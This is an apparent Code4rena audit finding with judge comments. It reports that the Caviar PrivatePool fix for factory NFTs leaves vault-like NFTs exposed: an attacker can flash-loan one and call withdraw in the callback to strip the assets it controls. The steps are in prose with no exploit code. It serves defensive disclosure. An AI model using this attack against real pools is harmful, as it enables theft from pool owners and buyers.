Closed code423n4 closed 1 year ago
outdoteth marked the issue as sponsor acknowledged
Technically true, but adding a blocklist adds a centralized dependency. The negatives of centralization outweigh the marginal benefit of fixing this imo.
Given:
Am considering a QA Low Severity
Hi @GalloDaSballo, really appreciate you for judging the issues over the weekend! I understand your points on this and my other report (#26) and would respect your judgements. Thanks again for your work and time!
GalloDaSballo changed the severity to QA (Quality Assurance)
Downgrading to QA considering the previous disclosure.
I highly recommend @outdoteth to warn via the UI around the risks of composability, but I believe that from C4's side, the finding was already shown in the previous contest
GalloDaSballo marked the issue as grade-c
Closing as OOS / Known
Lines of code
https://github.com/outdoteth/caviar-private-pools/blob/main/src/PrivatePool.sol#L163-L209
Vulnerability details
Impact
This mitigation for M-12: Prohibition to create private pools with the factory NFT adds the following
PrivatePoolNftNotSupported
error in thePrivatePool
contract and updates thePrivatePool.initialize
function to executeif (_nft == factory) revert PrivatePoolNftNotSupported()
. This prevents the creation of private pools that usesfactory
asnft
so no one can deposit or sell the Private Pool Factory NFT to another created private pool. Since malicious actors can no longer utilize functions likePrivatePool.flashLoan
andPrivatePool.withdraw
to transfer out the base tokens and NFTs owned by a Private Pool Factory NFT, the issue regarding the Private Pool Factory NFT in M-12: Prohibition to create private pools with the factory NFT is mitigated.https://github.com/outdoteth/caviar-private-pools/pull/14/files#diff-6beea546a01e795e1365ca8a74b2bd952631f6cd228a5a869bfed82bf1f46a0fR82
https://github.com/outdoteth/caviar-private-pools/pull/14/files#diff-6beea546a01e795e1365ca8a74b2bd952631f6cd228a5a869bfed82bf1f46a0fR160-R206
Yet, this issue still applies to other factory or vault-like NFTs, which are similar to the Private Pool Factory NFT and can control other assets. If a private pool is created with
nft
corresponding to such factory or vault-like NFT, users can still deposit or sell such NFT to that private pool. Then, a malicious actor can call thePrivatePool.flashLoan
function to borrow such NFT and call thePrivatePool.withdraw
function in the flashloan callback to withdraw all of the other assets controlled by such NFT. Afterwards, such NFT becomes worthless without controlling the other assets. If anyone still buys or borrows such NFT, it is a loss to that buyer or borrower; otherwise, it is a loss to the private pool owner if she or he is not the malicious actor.Proof of Concept
The following steps can occur for the described scenario.
PrivatePool.flashLoan
function to borrow such NFT and calls thePrivatePool.withdraw
function in the flashloan callback to withdraw all of the other assets controlled by such NFT. Then, such NFT, which no longer controls any of the other assets, is returned to Alice's private pool.PrivatePool.buy
function to buy back such NFT that he sold in step 2. However, because such NFT has become worthless, he essentially loses the other assets that were controlled by such NFT.Tools Used
VSCode
Recommended Mitigation Steps
A blocklist, which should only be updatable by the trusted admin, can be added to include the factory or vault-like NFTs that are similar to but not the Private Pool Factory NFT. Then, in addition to executing
if (_nft == factory) revert PrivatePoolNftNotSupported()
, thePrivatePool.initialize
function can be updated to also revert if_nft
is found in this blocklist. Moreover, this protocol should clearly communicate with its users regarding this risk so they can be extra cautious when deciding on whether they should interact with a private pool that uses such factory or vault-like NFT that is to be added to this blocklist.Assessed type
Other